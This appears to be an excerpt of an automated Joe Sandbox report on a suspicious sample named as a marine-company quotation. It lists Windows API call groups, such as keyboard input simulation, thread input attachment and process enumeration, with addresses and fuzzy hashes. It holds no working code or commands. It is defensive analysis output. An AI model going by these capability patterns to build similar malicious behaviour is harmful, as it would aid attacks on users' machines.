                                                                            • API String ID: 3321077145-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 006C5352
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C5375
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C5382
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006C53A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 3340791633-0
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,772EA2E0,?,00008000), ref: 0069ABF1
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0069AC0D
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0069AC74
                                                                            • SendInput.USER32(00000001,?,0000001C,772EA2E0,?,00008000), ref: 0069ACC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: d6685642146fb773396657950fbf8a2e39437bb09b5b4510671614374e94507e
                                                                            • Instruction ID: 782b3a8d137687efd78bdc0d83e5523ddb0a373f33320e4469a59c3479b4737c
                                                                            • Opcode Fuzzy Hash: d6685642146fb773396657950fbf8a2e39437bb09b5b4510671614374e94507e
                                                                            • Instruction Fuzzy Hash: A6310830A00618EFEF35CBA58C04BFA7BEFAB85321F04461EE4855AAD1C375898587D6
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 006C769A
                                                                            • GetWindowRect.USER32(?,?), ref: 006C7710
                                                                            • PtInRect.USER32(?,?,006C8B89), ref: 006C7720
                                                                            • MessageBeep.USER32(00000000), ref: 006C778C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 9c6388e907cf122fe8169d58731304e13531cebeb1a58de343d45fbd456e16ac
                                                                            • Instruction ID: 864a8279b9c7fa8794c00482ff02fcee70270a8228d2531e181f666b4c421933
                                                                            • Opcode Fuzzy Hash: 9c6388e907cf122fe8169d58731304e13531cebeb1a58de343d45fbd456e16ac
                                                                            • Instruction Fuzzy Hash: 01415534A09258DFCB01CF68D894FB9B7B6FB49314F5981ADE8149B361C734A942CFA0
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 006C16EB
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • GetCaretPos.USER32(?), ref: 006C16FF
                                                                            • ClientToScreen.USER32(00000000,?), ref: 006C174C
                                                                            • GetForegroundWindow.USER32 ref: 006C1752
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 7f8518791f8bc6591d183a19ab018fedbbe7891f1a9c320853382ca56f57922e
                                                                            • Instruction ID: 4fc3cc31ef0d1f47ca66a3e04b700f793994727b9533449865e8503489101b53
                                                                            • Opcode Fuzzy Hash: 7f8518791f8bc6591d183a19ab018fedbbe7891f1a9c320853382ca56f57922e
                                                                            • Instruction Fuzzy Hash: 53313D75D00149AFCB44EFA9C881DAEBBFAEF89314B5080ADE415E7212D7319E45CFA0
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00694C95
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00694CB2
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00694CEA
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00694D10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                            • String ID:
                                                                            • API String ID: 2796087071-0
                                                                            • Opcode ID: b7cf3c7aeac49eb183ec8bb073f5722cbd420856546f32b570d938b3df52a766
                                                                            • Instruction ID: b09b61f8307ab9e6de0cfc4a6b2bf4ba6d492ed3ee07d4250eac5c9a1ec43381
                                                                            • Opcode Fuzzy Hash: b7cf3c7aeac49eb183ec8bb073f5722cbd420856546f32b570d938b3df52a766
                                                                            • Instruction Fuzzy Hash: 7621F935604200BBEF155B35DD49E7B7B9EDF45760F10402DF809CA291EE61DC4296A0
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0069D501
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0069D50F
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0069D52F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0069D5DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 7b1ee9d9f7e65b9a785900981309918f365e15062296cd6e17c8409fa170c310
                                                                            • Instruction ID: 0c62877ac727f90b9f425b1d1a7abaa1f92e57b3017ec42716e35c8c8d268e7f
                                                                            • Opcode Fuzzy Hash: 7b1ee9d9f7e65b9a785900981309918f365e15062296cd6e17c8409fa170c310
                                                                            • Instruction Fuzzy Hash: DE3191711083009FD704EF64C881AAFBBFAEF99354F14092DF585862A1EB719945CBA2
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetCursorPos.USER32(?), ref: 006C9001
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00687711,?,?,?,?,?), ref: 006C9016
                                                                            • GetCursorPos.USER32(?), ref: 006C905E
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00687711,?,?,?), ref: 006C9094
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: c5654d1e9915a90e8e84ce680eff033cd8fe5d2bcb781c9e5fbf63ac623d4235
                                                                            • Instruction ID: cbb38f339da12a5e0654f20eebf1125b9de5848bdabaf6def3440c7910ce67d6
                                                                            • Opcode Fuzzy Hash: c5654d1e9915a90e8e84ce680eff033cd8fe5d2bcb781c9e5fbf63ac623d4235
                                                                            • Instruction Fuzzy Hash: 0D217F35700018EFDB298F94CC58FFA7BBAEB49360F54416EF905472A1C735A990DB64
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,006CCB68), ref: 0069D2FB
                                                                            • GetLastError.KERNEL32 ref: 0069D30A
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0069D319
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006CCB68), ref: 0069D376
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: a2bc62ac0fbbac20424b3d7dce7c890866814d1551247635ecee17fe765c5f34
                                                                            • Instruction ID: 639717a9147df753f53040040a1986aba3f59cb99fc3812e6c85d3d7c515ace7
                                                                            • Opcode Fuzzy Hash: a2bc62ac0fbbac20424b3d7dce7c890866814d1551247635ecee17fe765c5f34
                                                                            • Instruction Fuzzy Hash: 8721A170508201DFCB00DF28C8818AAB7EAEF56365F104A2DF499C37A1DB30DA46CB97
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C280A
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006C2824
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006C2832
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006C2840
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 6f6819161e7faf5ebf6bec1548fb94661d1199945b6f22816745b3dcd7d2b8d5
                                                                            • Instruction ID: bb31afaca98f3e41a89463103e69a8f9d47fedbc962428dcc1f76481526ef4e7
                                                                            • Opcode Fuzzy Hash: 6f6819161e7faf5ebf6bec1548fb94661d1199945b6f22816745b3dcd7d2b8d5
                                                                            • Instruction Fuzzy Hash: B9219235205512AFD7149B24C865FBA7796EF45324F14815CF8168B692C771EC42C7D0
                                                                            APIs
                                                                              • Part of subcall function 00698D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?), ref: 00698D8C
                                                                              • Part of subcall function 00698D7D: lstrcpyW.KERNEL32(00000000,?,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00698DB2
                                                                              • Part of subcall function 00698D7D: lstrcmpiW.KERNEL32(00000000,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?), ref: 00698DE3
                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697923
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697949
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: e986832308c2afdccefff658bca9e2adb53c494f7abbb74f158944d16912f701
                                                                            • Instruction ID: 8f03e6aca095d5c01b0a4d8a84c1451435b0ccff24bcf6c6eb2c1294f97546e9
                                                                            • Opcode Fuzzy Hash: e986832308c2afdccefff658bca9e2adb53c494f7abbb74f158944d16912f701
                                                                            • Instruction Fuzzy Hash: 6511033A200202AFCF159F35D844EBA77AAFF85360B10402AF906CB7A4EF319801C7A5
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C7D0B
                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 006C7D2A
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006C7D42
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006AB7AD,00000000), ref: 006C7D6B
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID:
                                                                            • API String ID: 847901565-0
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0066CDC6
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CDE9
                                                                              • Part of subcall function 00663820: RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0066CE0F
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0066CE31
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                            • String ID:
                                                                            • API String ID: 1794362364-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00691A47
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A59
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A6F
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A8A
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069E1FD
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0069E230
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0069E246
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0069E24D
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetClientRect.USER32(?,?), ref: 006C9F31
                                                                            • GetCursorPos.USER32(?), ref: 006C9F3B
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9F46
                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 006C9F7A
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                            • GetStockObject.GDI32(00000011), ref: 00636060
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006313C6,00000000,00000000,?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue), ref: 006630A5
                                                                            • GetLastError.KERNEL32(?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue,006D2290,FlsSetValue,00000000,00000364,?,00662E46), ref: 006630B1
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue,006D2290,FlsSetValue,00000000), ref: 006630BF
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0069747F
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00697497
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006974AC
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006974CA
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0C4
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0E9
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0F3
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B126
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 006C7E33
                                                                            • ScreenToClient.USER32(?,?), ref: 006C7E4B
                                                                            • ScreenToClient.USER32(?,?), ref: 006C7E6F
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006C7E8A
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(0070070C,?,?,00648747,00702514), ref: 00650202
                                                                            • LeaveCriticalSection.KERNEL32(0070070C,?,00648747,00702514), ref: 00650235
                                                                            • SetEvent.KERNEL32(00000000,00702514), ref: 006502C3
                                                                            • ResetEvent.KERNEL32 ref: 006502CF
                                                                            Similarity
                                                                            • API ID: CriticalEventSection$EnterLeaveReset
                                                                            • String ID:
                                                                            • API String ID: 3553466030-0
                                                                            • Opcode ID: 6d10a00fb7d6311d88f165a97877701fccf5d35b71ea54d6f70560deb6e274e5
                                                                            • Instruction ID: 24ac88b1ea608c44603fe23053803b26a15eeb877433ce6c5a0b8cb83c20ea1d
                                                                            • Opcode Fuzzy Hash: 6d10a00fb7d6311d88f165a97877701fccf5d35b71ea54d6f70560deb6e274e5
                                                                            • Instruction Fuzzy Hash: 68011671A01624DBCF049FA8FE48E657BA6FB49761B016129E90697720CE396D01CFD8
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00692DC5
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00692DD6
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00692DDD
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00692DE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 099fa4f587d3809bab2c52c242741fb46366b7f2df92047e74628eaac5df574d
                                                                            • Instruction ID: f02b5ba77934707321c624f64f038a14f2290d9c62d5b9117c445f7e31128754
                                                                            • Opcode Fuzzy Hash: 099fa4f587d3809bab2c52c242741fb46366b7f2df92047e74628eaac5df574d
                                                                            • Instruction Fuzzy Hash: 44E092715012247BDB201B739C0DFFB7E6EEF42BB1F001016F10AD14809AA0C845D6B0
                                                                            APIs
                                                                              • Part of subcall function 00649639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                              • Part of subcall function 00649639: BeginPath.GDI32(?), ref: 006496B9
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006C8887
                                                                            • LineTo.GDI32(?,?,?), ref: 006C8894
                                                                            • EndPath.GDI32(?), ref: 006C88A4
                                                                            • StrokePath.GDI32(?), ref: 006C88B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 5bf43e082fef34073d92e760a7444ee73de151e248b989de6d81b011de7167da
                                                                            • Instruction ID: 05c704fb4b5b00cf2795bf43ca3ca6009298cbd1800d64c30da032099b9ef0c3
                                                                            • Opcode Fuzzy Hash: 5bf43e082fef34073d92e760a7444ee73de151e248b989de6d81b011de7167da
                                                                            • Instruction Fuzzy Hash: 7FF0E236142258FBEB226F94AC0DFEE3F1AAF06320F448104FA01614E1CB791510CFE9
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00650AAF
